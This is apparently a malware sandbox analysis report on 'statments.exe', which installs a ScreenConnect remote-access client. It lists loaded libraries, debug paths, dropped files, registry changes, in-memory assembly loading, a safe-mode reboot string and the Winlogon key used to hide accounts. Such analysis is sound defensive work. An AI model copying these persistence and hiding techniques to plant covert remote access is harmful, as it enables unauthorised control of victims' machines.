                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                              Source: Window Recorder Window detected: More than 3 window changes detected
                              Source: C:\Users\user\Desktop\statments.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                              Source: statments.exe Static PE information: certificate valid
                              Source: statments.exe Static file information: File size 5652448 > 1048576
                              Source: statments.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x533200
                              Source: statments.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                              Source: statments.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                              Source: statments.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                              Source: statments.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: statments.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                              Source: statments.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                              Source: statments.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1676790291.0000000000CA2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1625996294.0000000000702000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: statments.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: statments.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: statments.exe
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2808712261.00000000023F7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1685618274.00000000127A0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: statments.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2791566703.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1677731349.0000000002791000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1677160184.0000000000F80000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1677294239.0000000000FC2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: statments.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.1608297355.00000000005AD000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: statments.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.1575096863.0000000004250000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1572578801.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.1572578801.0000000004352000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: statments.exe, MSI3C18.tmp.3.dr, 4d36d8.msi.3.dr, setup.msi.1.dr, MSI3C77.tmp.3.dr, MSI3F66.tmp.3.dr, 4d36d9.rbs.3.dr, 4d36da.msi.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2808712261.00000000023F7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1685618274.00000000127A0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1625996294.0000000000702000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: statments.exe, 4d36d8.msi.3.dr, setup.msi.1.dr, MSI2F66.tmp.2.dr, 4d36da.msi.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: statments.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1676790291.0000000000CA2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.2808712261.00000000023F7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1685618274.00000000127A0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: statments.exe
                              Source: statments.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                              Source: statments.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                              Source: statments.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                              Source: statments.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                              Source: statments.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                              Data Obfuscation

                              Source: 1.0.statments.exe.9578f8.1.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                              Source: 1.2.statments.exe.1230000.0.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                              Source: statments.exeStatic PE information: real checksum: 0x54fd91 should be: 0x56e39d
                              Source: C:\Users\user\Desktop\statments.exeCode function: 1_2_01186F00 push eax; mov dword ptr [esp], ecx1_2_01186F11
                              Source: C:\Users\user\Desktop\statments.exeCode function: 1_2_055F5522 push eax; retf 1_2_055F5529
                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_3_068E8480 push es; ret 5_3_068E8490
                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_3_068E29A0 push es; ret 5_3_068E29B0
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 8_2_00CF7752 push 84038DCFh; iretd 8_2_00CF7759
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 8_2_00CF7732 push eax; iretd 8_2_00CF7739
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 8_2_00CF5A05 pushfd ; iretd 8_2_00CF5A1A
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 8_2_051A0640 pushad ; ret 8_2_051A0653
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 8_2_051B3ABD push ebx; retf 8_2_051B3ADA
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4A8B00BD pushad ; iretd 10_2_00007FFB4A8B00C1
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4ABC2F3C pushfd ; iretd 10_2_00007FFB4ABC2F3D
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4ABC5800 pushad ; retn 4ABBh10_2_00007FFB4ABC5859
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4ABC7D94 push ss; iretd 10_2_00007FFB4ABC7D95
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFB4AC098F8 push cs; iretd 11_2_00007FFB4AC09BCF
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFB4AC0203F push ds; iretd 11_2_00007FFB4AC02046
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFB4AC05990 push esi; retf 11_2_00007FFB4AC059D7
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFB4AC0994C push cs; iretd 11_2_00007FFB4AC09BCF
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFB4AC139D1 push cs; retf 11_2_00007FFB4AC139FA

                              Persistence and Installation Behavior

                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\Microsoft.Deployment.Compression.Cab.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsAuthenticationPackage.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exe
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\ScreenConnect.Windows.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsCredentialProvider.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI3F66.tmp
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\ScreenConnect.Core.dll
                              Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\ScreenConnect.InstallerActions.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exe
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\Microsoft.Deployment.Compression.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI3C77.tmp
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.ClientService.dll.3.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (de5851ad6e374ce3)

                              Hooking and other Techniques for Hiding and Protection

                              Source: statments.exe, 00000001.00000000.1521771269.0000000000426000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: statments.exe, 00000001.00000002.1564198398.0000000005440000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: rundll32.exe, 00000005.00000003.1572578801.00000000043CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2791566703.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1689599755.000000001B6A2000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1677731349.0000000002791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
